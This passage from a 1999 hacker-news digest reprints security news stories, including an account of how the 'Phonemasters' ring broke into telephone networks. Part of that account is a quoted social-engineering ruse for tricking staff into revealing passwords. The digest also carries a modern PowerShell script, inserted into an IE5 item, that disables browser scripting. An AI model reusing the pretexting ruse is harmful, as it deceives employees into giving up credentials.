demo. The response is "That can't be true. We would all know about
this if that were true". That is why I think this story will be big
when it breaks in the mainstream press.
Summary:
SSL is NOT dead. It is just an inappropriate security system for many Internet based transaction systems. As with
many things on the Internet the growth of online sales, and especially the growth of online brokerages has been
stupendous. SSL was simply not designed with systems like these in mind, and systems like DigitalBond are attempting
to fix this. Chances are in 5 to 10 years that the existing systems will be found to be "weak", and replaced with better
systems.
Kurt Seifried is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural
fiber and Linux security, part of a complete breakfast.
Related links:
http://www.digitalbond.com/
http://developer.netscape.com/tech/security/ssl/howitworks.html
http://developer.netscape.com/docs/manuals/security/sslin/index.htm
@HWA
50.0 THE FUTURE OF AV COMPANIES
~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:10 pm CET
Soon, every user will get free virus detection software over the Internet. So what does
this future hold for anti-virus companies? "In the future it won't be about protecting
computers against viruses, but content security", says security firm ICCA. But it's all
about the updates, according to Symantec. Full story
http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Virus protectors get a brand new bag
By Robert Lemos, ZDNN
October 1, 1999 4:18 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html
VANCOUVER, Canada -- Anti-virus software is quickly going the way of the browser -- soon
to be free and ubiquitous, said industry insiders Friday at the Virus Bulletin99 conference.
Soon, every user will get free detection software, with security firms selling updates via the Internet
at a monthly fee. Anti-virus services will also be sold to Internet Service Providers for resale to
users.
"In the future it won't be about protecting computers against viruses, but content security," said
Larry Bridwell, program technology manager for security firm International Computer Security
Association.
With the number of threats against computers increasing -- viruses, hackers, privacy-invading
companies, and good old-fashioned bugs, to name a few -- keeping content safe and the
computer running is now Job No.1.
Consumers' desire for a single fix-it package is changing the economics of the industry, admitted
Carey Nachenberg, chief scientist for the Symantec Anti-virus Research Center.
"We're all afraid the retail channel will dry up," he said.
Viruses with sneakers
An even more important factor: Viruses infecting computers via e-mail move far too quickly for
companies to rely on manual updates to their software.
Last spring, for example, the Melissa virus infected hundreds of thousands of computers within 48
hours. "We're at a turning point right now," said Nachenberg in a keynote speech Thursday. "We
need to re-examine our anti-virus software, and companies need to re-examine their anti-virus
strategies."
Symantec (Nasdaq:SYMC) is taking a two-pronged approach to the problem. With partner IBM
Corp. (NYSE:IBM), the anti-virus software maker is nearing completion of its "Digital Immune
System." The technology automatically updates all subscribers over the Internet with virus
recognition patterns whenever one of those computers encounters a new virus.
Fixes for a new virus can be disseminated to all the machines on the network within as little as 30
minutes of encountering the first virus. The speed of the Internet, which viruses use to spread
quickly, can now be used to get the cure out just as fast.
"As we distribute information faster and more broadly, we have to be careful," said Steve White,
senior manager of IBM's Massively Distributed Systems Research Division, who helped design
the new Digital Immune System service. "It becomes much easier to get viruses over the Internet."
Firewall for the home
Symantec is also preparing to package its anti-virus software into a single integrated security suite
that will give home users a firewall, Internet filtering software and anti-virus utilities, said Symantec
engineers at the show. The product will be released later this month.
But even that stand-alone product will eventually be connected to the Digital Immune System
service, providing virus updates extremely quickly.
"The whole industry is going toward automatic fixes and automatic updates," said IBM's White.
"The anti-virus vendors are just adopting it faster."
Symantec's rivals are working on similar strategies. "A lot of the basis of value of a stand-alone
product in the home is going away," said Craig Kensek, director of product marketing for
anti-virus firm Trend Micro Inc. "For the non-technical home user, it's like insurance."
Trend announced in September its new eDoctor strategy, which allows ISPs to protect their
customers from viruses by scanning each file downloaded from the Internet. U S West
(NYSE:USW) and Sprint Communications Corp. (NYSE:FON) have signed on to the service.
Virus reporting valuable
Rival security software firm Network Associates Inc. (Nasdaq:NETA) plans to release a similar
technology to Symantec's called the AutoImmune System, early next year, its engineers said.
While finding and fixing viruses faster has captured the interest of corporate network
administrators, an automated system's ability to collect data on the number of virus incidents is
equally valuable, said one administrator at the conference, who asked to remain anonymous.
Currently, the best source of such data is the Wildlist, and even that volunteer site would like to
see better and more accurate statistics, said Sarah Gordon, one of the directors of the
independently maintained Wildlist.
"It would be extremely useful to get reports from these systems," she said. "We intend to pursue
that in the future."
@HWA
51.0 UNPLUGGING THE "PHONEMASTERS"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 2:55 pm CET
ZDNet has a story on the "ring of hackers" calling themselves the Phonemasters,
who gained access to the telephone networks of companies such as AT&T, British
Telecom, MCI Worldcom, etc., and on how they were tracked and busted by FBI
agents.
http://www.zdnet.com/zdnn/stories/news/0,4586,2345639,00.html
Unplugged! The biggest hack in history
By John Simons, WSJ Interactive Edition
October 1, 1999 8:54 AM PT
URL: http://www.newslinx.com/
DALLAS -- In a federal courtroom here, Calvin Cantrell stands silently, broad shoulders
slouched. His lawyer reads from a short letter he has written:
"My parents taught me good ethics, but I have departed from some of these, lost my way
sometimes," the letter states. "I was 25 and living at home. No job, and no future... . All I ever
really wanted was to work with computers."
Cantrell certainly did work with computers -- both his own, and, surreptitiously, those of some of
the largest companies in the world. He was part of a ring of hackers that pleaded guilty here to the
most extensive illegal breach of the nation's telecommunications infrastructure in high-tech history.
And sitting behind him in court as he was sentenced two weeks ago was the
accountant-turned-detective who caught him: Michael Morris. A decade earlier, Morris, bored
with accounting work, left a $96,000 job at Price Waterhouse and enrolled in the FBI academy,
at $24,500 a year. Cantrell's sentencing was the final act in a five-year drama for Morris, and
secured his reputation as the FBI's leading computer gumshoe.
The tale of Morris and Cantrell is among the first cops-and-robber stories of the New Economy,
involving, among other things, the first-ever use of an FBI "data tap." It illustrates how the nation's
law-enforcement agencies are scrambling to reinvent their profession in a frantic effort to keep
pace with brilliant and restless young hackers.
Unlimited potential for harm
The story also shows that hacking's potential harm is far more ominous than theft of telephone
credit-card numbers. Cantrell was part of an eleven-member group dubbed "The Phonemasters"
by the FBI. They were all technically adept twentysomethings expert at manipulating computers
that route telephone calls.
The hackers had gained access to telephone networks of companies including AT&T Corp.,
British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications
Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases
belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun
& Bradstreet, court records show.
The breadth of their monkey-wrenching was staggering; at various times, they could eavesdrop on
phone calls, compromise secure databases, and redirect communications at will. They had access
to portions of the national power grid, air-traffic-control systems and had hacked their way into a
digital cache of unpublished telephone numbers at the White House. The FBI alleges, in evidence
filed in U.S. District Court for the Northern District of Texas, that the Phonemasters had even
conspired to break into the FBI's own National Crime Information Center.
Unlike less-polished hackers, they often worked in stealth, and avoided bragging about their
exploits. Their ultimate goal was not just fun, but profit. Some of the young men, says the FBI,
were in the business of selling the credit reports, criminal records, and other data they pilfered
from databases. Their customers included private investigators, so-called information brokers and
-- by way of middlemen -- the Sicilian Mafia. According to FBI estimates, the gang accounted for
about $1.85 million in business losses.
"They could have -- temporarily at least -- crippled the national phone network. What scares me
the most is that these guys, if they had had a handler, whether criminal or state-sponsored, could
have done a lot of damage," says Morris. "They must have felt like cyber gods."
Some may be still at large
With the exception of Cantrell, none of the defendants in the Phonemasters case would comment
on the matter. Others are thought to remain at large. This is the story of Cantrell and two
accomplices largely put together from federal district court records and FBI interviews. Morris
first learned of the group in August 1994, when he got a phone call from a Dallas private
investigator, saying Cantrell had offered to sell him personal data on anyone he wished. He even
offered a price list: Personal credit reports were $75; state motor-vehicle records, $25; records
from the FBI's Crime Information Center, $100. On the menu for $500: the address or phone
number of any "celebrity/important person."
Morris immediately opened an investigation. Only 33-years-old at the time, he had taken an
annual pay cut to join the FBI just five years earlier. He had been a tax consultant at Price
Waterhouse, and despised the work. "I was young and making the big bucks, but every morning I
would think 'God, I don't want to go to work.' "
Tall, square-jawed and mustachioed, Morris began working on white-collar crimes when he
arrived at the Dallas FBI field office. He took on a few hacker cases and realized he liked the
challenge. "These guys are not the kind who'll rob the convenience store then stare right into the
security camera," he says. "Trying to be the Sherlock Holmes of the Internet is hard when the
fingerprints on the window can be so easily erased."
Morris convinced the private investigator to meet with Cantrell while wearing an audio taping
device. After reviewing the tapes, he was certain that he was onto something big. He applied for
and received court authority to place a digital number recorder on Cantrell's phone lines, which
would log numbers of all outgoing calls. It showed that Cantrell frequently dialed corporate
telephone numbers for AT&T, GTE, MCI, Southwestern Bell and Sprint. Cantrell had also placed
calls to two unlisted numbers at the White House, which further piqued Morris's interest.
So, late that summer, Morris took an unprecedented step. He began writing a 40-page letter to
the FBI's Washington headquarters, the Department of Justice and the federal district court in
Dallas. Recording Cantrell -- now his central suspect -- while on the phone wasn't sufficient for
the job that faced him, he believed. Instead, he needed new federal powers. He asked for
Washington's permission to intercept the impulses that traveled along Cantrell's phone line as he
was using his computer and modem.
"It's one of the hardest techniques to get approved, partly because it's so intrusive," says Morris,
who spent the next month or so consulting with federal authorities. "The public citizen in me
appreciates that," he says. Still, the long wait was frustrating. "It took a lot of educating federal
attorneys," he says.
Once authorities said yes, Morris faced another obstacle: The equipment he needed didn't exist
within the FBI. Federal investigators had experimented with a so-called data-intercept device only
once before in a New York hacker case a year earlier. It had failed miserably.
Morris and technicians at the FBI's engineering lab in Quantico, Va., worked together to draft the
specifications for the device Morris wanted. It would need to do the reverse of what a computer's
modem does. A modem takes digital data from a computer and translates it to analog signals that
can be sent via phone lines. Morris's device would intercept the analog signals on Cantrell's phone
line and convert those impulses back to digital signals so the FBI's computers could capture and
record each of a suspect's keystrokes.
Alerting the victims
While waiting for the FBI to fit him with the proper gear, Morris contacted several of the
telephone companies to alert them that they had been victimized. The reception he got wasn't
always warm. "It's kind of sad. Some of the companies, when you told them they'd had an
intrusion, would actually argue with you," he said.
GTE was an exception. Morris discovered that Bill Oswald, a GTE corporate investigator, had
opened his own Phonemasters probe. Oswald and Morris began working together and uncovered
another of Cantrell's schemes: He and some friends had managed to get their hands on some
telephone numbers for FBI field offices. They entered the telephone system and forwarded some
of those FBI telephones to phone-sex chat lines in Germany, Moldavia and Hong Kong. As a
result of the prank, the FBI was billed for about $200,000 in illegal calls.
Morris also learned that on Oct. 11, 1994, Cantrell hacked GTE's computer telephone "switch" in
Monticeto, Calif., created a fake telephone number and forwarded calls for that number to a
sex-chat line in Germany. The FBI isn't sure how Cantrell convinced people to call the number,
but court records show that Cantrell received a payment of $2,200 from someone in Germany in
exchange for generating call traffic to the phone-sex service.
In early December 1994, Morris's "analog data-intercept device" finally arrived from the FBI's
engineering department. It was a $70,000 prototype that Morris calls "the magic box."
On Dec. 20, Morris and other agents opened up their surveillance in an unheated warehouse with
a leaky roof. The location was ideal because it sat between Cantrell's home and the nearest
telephone central office. Morris and nine other agents took turns overseeing the wiretap and data
intercepts. The agents often had to pull a tarp over their workspace to keep rain from damaging
the costly equipment.
As middle-class families go, the Cantrells seem exemplary. Calvin's father,
Roy, was a retired detective who had once been voted "Policeman of the Year" in Grand Prairie,
the suburb west of Dallas where they live. His mother, Carol, taught Latin and English at Grand
Prairie High School, where Calvin graduated in 1987 with above-average grades.
As a student, he was no recluse. He had a small circle of friends who shared
his love of martial arts, video games and spy movies. Cantrell's longtime
friend, Brandon McWhorter, says Calvin was always a fun-loving guy, but
there was one thing about which he was very serious.
"He would always talk to me about religion," McWhorter says. "He held very
strong religious beliefs."
After high school, Cantrell continued to live at home while taking classes at the University of Texas
at Arlington and a local community college.
He held a series of odd jobs and hired himself out as a deejay for weddings and corporate parties.
Cantrell balanced school, work, family and friends even as he began hacking more often. His
parents became suspicious, but said nothing. The family had three phones; Calvin stayed on his 15
hours a day.
"They'd go in my room and see all the notes and the phone numbers. Even though they couldn't
put it together technically, they knew something was up," says Cantrell. "They were kind of in
denial... . My parents were pretty soft."
Mrs. Cantrell says Calvin had been so well-behaved that she never suspected his computer
activities were more than fun and games. "I wish I had known what was going on. Unfortunately,
my son was smarter than I was." (Calvin's father passed away last year.)
The hack
At 8:45 on the night of Dec. 21, just four days before Christmas, Cantrell went online. Using an
ill-gotten password, he entered a Sprint computer, where he raided a database, copying more
than 850 calling-card access codes and other files, court records in the case show.
The Phonemasters often got passwords and other key information on companies in a low-tech
approach called "Dumpster diving," raiding the trash bins of area phone firms for old technical
manuals, phone directories and other company papers. This often allowed Cantrell to run one of
his favorite ruses -- passing himself off as a company insider.
"I'd call up and say, 'Hi, I'm Bill Edwards with systems administration.' ... I'd chat with them for a
while, then I'd say 'We're doing some network checkups today. Can you log off of your
computer, then tell me every character you're typing as you log back on?' A lot of people fell for
that," Cantrell says.
After hacking into the Sprint database that evening, Cantrell talked to another
hacker, Corey Lindsley, over the phone. He'd "met" Lindsley, and another
hacker, John Bosanac, in 1993 while surfing the murky world of hacker
bulletin boards. Cantrell then sent the copied files to Lindsley, who was a
student at the University of Pennsylvania in Philadelphia.
Morris's equipment captured everything -- voice and data. It was an FBI
first. "We're sitting in this place that looked like a bomb pit, but the
atmosphere was really exciting," says Morris. "We were ecstatic."
As the days passed, the FBI wiretap generated stacks upon stacks of
audiotapes and data transcripts. Some was just idle talk among friends, the
occasional call to finalize dinner plans, lots of workaday chatter. But the
incriminating evidence mounted. "It's great, you know. I really love fraud,"
joked Bosanac, a Californian who was musing with Cantrell about the various technical methods
of using other people's cellular telephone accounts to place free calls. "Fraud is a beautiful thing."
Family conversations even entered the investigation. On Jan. 7, for instance, Cantrell called his
mother from a friend's house and asked her to find an MCI manual on his shelf. He then asked her to
read him a set of directions for accessing MCI's V-NET computer system. Mrs. Cantrell read the
material but asked her son whether he was supposed to have the book, citing warnings that stated
its contents were restricted to MCI employees. Cantrell just avoided his mother's question. The
FBI data-tap captured every word.
Taking a toll
Still, the process took its toll on the FBI team, especially coming during the holidays. "It was
stressful that the wiretap was going 24 hours a day, seven days a week. I had to write up the legal
documents, and it's tough making people work through Christmas," Morris said. On top of that, he
had to keep records of his findings, and every 10 days he had to reapply to the court to prove that
his wiretap was yielding evidence.
By late January, the FBI had begun to get a clear profile of Cantrell and his hacker friends.
Lindsley, it appeared, was the group's acerbic leader, directing much of the hacking activity. Over
phone lines, the FBI heard him bragging about how he had given a Pennsylvania police department
"the pager treatment" in retaliation for a speeding ticket he received. Lindsley had caused the
police department's telephone number to appear on thousands of pagers across the country. The
resulting flood of incoming calls, Lindsley bragged, would surely crash the department's phone
system.
They also enjoyed collecting information about film stars, musicians and other famous people.
Cantrell has admitted that he broke into President Clinton's mother's telephone billing records in
Arkansas to obtain a list of unpublished White House numbers. The men, says the FBI, even
made harassing phone calls to rock star Courtney Love and former child actor Danny Bonaduce
using pilfered numbers.
They weren't without fear of getting caught. On the evening of Jan. 17, for instance, there was a
clicking on the phone line as Bosanac, Cantrell, and Lindsley shared a three-way conference call.
"What the hell happened?" asked Bosanac, according to an FBI transcript of the conversation.
"That was the FBI tapping in," laughed Cantrell.
"Do you know how ironic that's gonna be when they play those tapes in court?" Lindsley said.
"When they play that tape in court and they got you saying it was the FBI tapping in?"
On Jan. 18, the FBI overheard Cantrell, Bosanac and Lindsley on another conference call. With the other two
men giving directions, Cantrell dialed his computer into Southwestern Bell's network and copied a
database of unlisted phone numbers. The three men then discussed plans to write a computer
program that could automatically download access codes and calling-card numbers from various
telephone systems. They also talked about the chance that the FBI would one day track them
down.
"Just remember, nobody f-- rats anybody out," said Lindsley to the others. "No deals."
"Yeah, no deals is right," replied Bosanac.
"No deals. I'm serious. I don't care what your f-- lawyers tell you," said Lindsley.
Cantrell said nothing.
Transferred codes to Canada
Later that morning, between 5:09 and 7:36, Cantrell entered Sprint's computer system and
downloaded about 850 Sprint calling-card codes. He then transferred those codes to a man in
Canada. The codes would allow anyone who purchased them to place free international phone
calls. Morris would later learn that a contact in Canada paid Cantrell $2 apiece for each code,
court records show. The Phonemasters most likely did not know -- or care -- where the codes
ended up, but the FBI traced them and found some ended up in the hands of a Sicilian Mafia
operative in Switzerland.
On Jan. 23, while probing a U S West telephone database, Cantrell, Bosanac, Lindsley and
others stumbled over a list of telephone lines that were being monitored by law enforcement. On a
lark, they decided to call one of the people -- a suspected drug dealer, says Morris -- and let him
know his pager was being traced by the police.
On Jan. 27, the group was clearly feeling paranoia about being caught, prompting Lindsley to tell
his accomplices to pull as many Sprint codes as quickly as they could. Cantrell began to have
reservations.
"What if I stopped before all of y'all?" Cantrell asked Lindsley. "Would you applaud my efforts?"
"No," said Lindsley. "I don't think there's any reason to stop. What are you worried about?"
"Uh, I'm not worried about anything. I'm just saying, uhm. There might ... there might come a time
here where I don't have time for this."
He added a little later: "I, you know, really like it. But, I don't know, I just ... Eventually, I don't
see myself doing a lot of illegal things."
Lindsley continued to prod Cantrell to speed up the download of stolen codes by spending more
time online and using two phones.
"I'm telling you, you run two lines around the clock," Lindsley said.
"You can't run them around the clock," said Cantrell.
"Why not?"
"Oh, come on. I think that's pushing it too hard."
"I think you just got a weak stomach there, boy."
Tension rises
By late February, things began to get tense. One of Cantrell's hacker friends informed him that his
number had shown up in a database of phone numbers being monitored by the FBI. In all the
excitement of burglarizing databases and rerouting phone calls, the Phonemasters had neglected to
check their own phone lines for any signs that law enforcement might be listening in.
Morris hastily arranged for an FBI raid. On Feb. 22, 1995, agents raided
Cantrell's home, Lindsley's college dorm room, and burst into Bosanac's
bedroom in San Diego.
For Morris, the climactic raid was only the start of a long battle to bring the
hackers to justice. Because of the complicated nature of his evidence
gathering, it took him more than two years to compile the most salient
portions of the wiretap transcripts and data-tap evidence. "All the documents
and tapes from this case could fill a 20-by-20 room," Morris explains. "And
at the time, I was the only computer investigator for all of Texas."
In the meantime, as federal prosecutors slowly geared up for a trial, Cantrell
tried to get on with his life. "I spent the first few weeks after the raid being
paranoid and wondering what would happen," he says. Occasionally, Morris and other agents
would call him, asking questions about some of the systems he had hacked. By the summer of
1995, at the urging of his mother, Cantrell started attending church again. He scored the first in a
string of professional computing jobs, doing systems-administration work for a company called
Lee Datamail in Dallas. He neglected to tell his employers about the FBI case. "It's been mental
torture for the last four years, not knowing," says Cantrell. "Can I go to school, move to another
state? That kind of thing messes with your head."
Over time, Cantrell says he had come to seriously regret what he had done and the $9,000 he
says he made from selling codes wasn't worth the trouble. "Looking back, it was all crazy. It was
an obsession. I wanted to see how much I could conquer and a little power went to my head."
Cantrell notes that he has since tried to make amends, even helping the phone companies plug
their security holes and helping the FBI gather more information on some of the group's members
who haven't yet been apprehended.
The matter finally seemed near conclusion this March when Morris was able to play "a couple of
choice tapes" in separate meetings with Cantrell, Bosanac and Lindsley. Afterward, all three
agreed to plead guilty to federal charges of one count of theft and possession of unauthorized
calling-card numbers and one count of unauthorized access to computer systems. Chief Judge
Jerry Buchmeyer ordered a presentencing investigation.
During a hearing on the matter, Lindsley's attorney tried to argue that the FBI had wildly
overstated the $1.85 million in losses that her client's hacking had allegedly caused. But in the end,
Judge Buchmeyer rejected the argument and sentenced him to 41 months in prison. Bosanac, in
the meantime, has asked that his sentencing hearing be moved to San Diego, where he lives.
As for Cantrell, Judge Buchmeyer lauded his "acceptance of guilt." He could have been sentenced
to three years in federal prison; instead he was given two. He reports to federal prison in January
of next year.
Morris, meanwhile, has used his data-tap method in several other cases; he also travels around the
country and the world advising law-enforcement agencies on how to conduct state-of-the-art
investigations of hacker crimes.
@HWA
52.0 INDIA RESPONDS TO Y2K ACCUSATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 2:45 pm CET
Indian firms have done more than $2 billion worth of coding work to protect old
computers from the Y2K problem, but accusations are made by some that India and
Israel appear to be the "most likely sources" of malicious code. Indian officials
yesterday reacted to these claims speaking of it as a ridiculous suggestion. Indian
reaction
http://www.wired.com/news/news/politics/story/22041.html
India: Code-Smuggling? Absurd
Reuters
11:45 a.m. 1.Oct.99.PDT
Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to
smuggle in computer codes aimed at threatening Washington's security.
Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K
modifications had begun to surface in some US work undertaken by foreign contractors.
The claim signaled possible economic and security threats.
Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer
assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code.
The article appeared in the June issue of Infrastructure Protection Digest.
"I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the
Indian government's Y2K Action Force.
"I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement,"
Ahluwalia told Reuters.
He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully
can be useful to people."
Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two
digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns.
India and Israel have had differences with the United States on security matters, particularly on nuclear policy.
Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss
suggestions Indian firms may be a security threat.
He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients.
Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added.
"We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said.
He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in
client systems.
Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road.
This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of
data, he said.
Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term
consequences of using foreign firms for Y2K work could include more espionage and reduced information security.
Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions.
"I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to
happen," he said. "We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors."
Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm
US systems but did not rule out threat possibilities.
Copyright 1999 Reuters Limited.
@HWA
53.0 ANOTHER IE 5.0 HOLE EXPOSED
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 10:20 am CET
O swell, here's another Internet Explorer hole for you. The latest problem can occur
through a download file link in HTML. The bogus link can open a path to your
computer. This bug also bypasses firewalls to access PCs. Once again, turn off the
scripting, people! ZDNet report on it
http://www.zdnet.com/zdnn/stories/news/0,4586,2344472,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
IE 5.0 security hole exposed
By Peter Deegan, Help Channel
September 30, 1999 8:02 AM PT
URL: http://www.newslinx.com/
Every time you look there's another security breach found in Microsoft Internet Explorer 5.0. Like
many of these problems there are no reports of it being used maliciously yet, but now that the
details are out, the chances of someone making use of the information grows.
This latest problem can occur through what appears to be a download file link on a Web page,
newsgroup message or HTML e-mail message. The bogus download link can open a path to your
computer, through which it's possible to read files on your computer. You don't need to click on
the link to be affected because it is possible to automatically activate the link when you view the
Web page or e-mail message.
The problem is in the Active Scripting component of Microsoft (Nasdaq:MSFT) Internet Explorer
5. Working behind a corporate firewall or proxy is no protection from this security hole.
What can you do about it?
There's no patch available for the problem, though Microsoft has issued a security alert and is
working on the problem now. In the meantime you can protect yourself by switching off the Active
Scripting component. In Internet Explorer 5, select Tools | Internet Options, then click on the
Security tab. Select the Internet Zone, then click on the "Custom Level" button. Scroll down to the
"Scripting" heading, find the "Active Scripting" entry and change it to "Disable." Click OK.
Keep in mind, this temporary fix may do you more harm than good.
Scripting is used by many Web sites, and it's possible that some service
on a Web page won't work once you turn scripting off. The best
example of this is the Windows Update option in IE5 itself; this is the easiest way to update the
browser with security patches and other new features. So if you turn off Scripting in IE5 you won't
be able to use the Windows option to get the update to fix Scripting. Catch 22!
You could change the Scripting setting to "Prompt," which means you'll get a warning when you go
to a Web page that has a scripting component. The problem with this is that the prompt gives you
no indication of what the scripting will do so you're asked to make a decision with no information.
While the risk in the short term of this problem is relatively low, you can switch off scripting if
you're concerned -- but keep in mind the consequences. Remember to turn scripting back on
when using Tools | Windows Update to check for an update. Let's hope the security patch for this
problem arrives soon.
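The article's workaround is a hand-driven walk through the Internet Options dialog. As an added example that is not part of the ZDNet piece, the following PowerShell script audits and changes the same "Active Scripting" setting for the Internet zone through the registry, so the Disable/Prompt/Enable toggle (and the re-enable needed for Windows Update) can be done and verified from a script. It assumes a Windows host with PowerShell and the per-user zone settings layout under HKCU that later IE versions use (zone 3 = Internet, value 1400 = Active scripting, 0 = Enable, 1 = Prompt, 3 = Disable).

```powershell
# Added example, not from the article. Assumes the per-user Internet zone
# settings live under this key (3 = Internet zone) and that the DWORD named
# 1400 is "Active scripting" with 0 = Enable, 1 = Prompt, 3 = Disable.
$ZonePath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'
$ActiveScriptingValue = '1400'
$PolicyName = @{ 0 = 'Enable'; 1 = 'Prompt'; 3 = 'Disable' }
$PolicyCode = @{ Enable = 0; Prompt = 1; Disable = 3 }

function Get-InternetZoneActiveScripting {
    # Returns the readable name of the current setting. If the value is
    # absent, the zone falls back to its default, which is Enable for
    # the Internet zone.
    $item = Get-ItemProperty -Path $ZonePath -ErrorAction SilentlyContinue
    if ($null -eq $item -or $null -eq $item.$ActiveScriptingValue) {
        return 'Enable (default, value not set)'
    }
    $raw = [int]$item.$ActiveScriptingValue
    if ($PolicyName.ContainsKey($raw)) { return $PolicyName[$raw] }
    return "Unknown ($raw)"
}

function Set-InternetZoneActiveScripting {
    # Writes the requested setting and echoes what the registry now holds,
    # so the change is verified rather than assumed.
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Enable', 'Prompt', 'Disable')]
        [string]$Mode
    )
    if (-not (Test-Path $ZonePath)) {
        New-Item -Path $ZonePath -Force | Out-Null
    }
    Set-ItemProperty -Path $ZonePath -Name $ActiveScriptingValue `
        -Value $PolicyCode[$Mode] -Type DWord
    Write-Host "Internet zone Active Scripting is now: $(Get-InternetZoneActiveScripting)"
}

# Usage mirroring the article's advice: record the current state, disable
# scripting while no patch exists, and re-enable it only for the time it
# takes to run Windows Update.
Write-Host "Before: $(Get-InternetZoneActiveScripting)"
Set-InternetZoneActiveScripting -Mode Disable
# ... later, just before Tools | Windows Update:
# Set-InternetZoneActiveScripting -Mode Enable
```

Because the key is per-user, run the script as the user whose browser profile you are hardening; a domain Group Policy that locks the zone settings will override whatever the script writes.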
@HWA
54.0 TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:50 am CET
Key members of the U.S. telecommunications industry complained this week that a
government deadline for compliance with a new digital wiretapping law is "unrealistic."
Matthew Flanigan, president of the Telecommunications Industry Association (TIA),
warned that "Calea compliance involves one of the most complicated sets of features
ever developed by manufacturers." To comply, Flanigan said, manufacturers must
develop software interfaces for hundreds of network elements without bringing down
telecom networks. Full story
http://www.eet.com/story/OEG19990929S0022
Telecom industry decries digital wiretap deadline
By George Leopold
EE Times
(09/29/99, 2:24 p.m. EDT)
WASHINGTON -- Key members of the U.S. telecommunications industry complained this week that a
government deadline for compliance with a new digital wiretapping law is "unrealistic."
While praising the Federal Communications Commission (FCC) for finally issuing guidelines to implement the
controversial wiretap law -- the Communications Assistance for Law Enforcement Act (Calea) -- a trade group
here charged with developing standards said a Sept. 30, 2001, deadline for compliance is too soon.
Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea
compliance involves one of the most complicated sets of features ever developed by manufacturers." The FCC
decision "will only add to the complexity and difficulty," he said.
To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements
without bringing down telecom networks.
In issuing its final order earlier this week, the FCC designated the industry group as the standards-setting body
for converting myriad legal decisions about the wiretap law into technical standards needed by manufacturers to
comply with the 1994 law.
@HWA
55.0 FED COMPUTER SECURITY BILL HAS STRONG SUPPORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:25 am CET
A house bill aimed at beefing up computer security in civilian federal agencies
received a broad endorsement from government and high-tech industry leaders today.
Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide
much needed security guidance to non-military federal agencies, it could help beef-up
private-sector computer security by providing the public with a list of
government-approved security devices, National Institute of Standards and
Technology (NIST) Director Raymond Kammer said yesterday. The legislation
appears to have strong support in the Subcommittee on Technology after a hearing on
the matter yesterday. Newsbytes
http://www.newsbytes.com/pubNews/99/137105.html
Fed Computer Security Bill Has Strong Support
By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A.,
30 Sep 1999, 3:56 PM CST
A house bill aimed at beefing up computer security in civilian federal agencies received a broad
endorsement from government and high-tech industry leaders today.
Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to
non-military federal agencies, it could help beef-up private-sector computer security by providing the public with a list of
government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer
said today.
Kammer spoke at a hearing on H.R. 2413 held by the House Science Committee's Subcommittee on Technology.
The legislation appears to have strong support in the Subcommittee.
"Despite the money, manpower and management priority we've exerted on the Y2K problem, I believe a lack of adequate
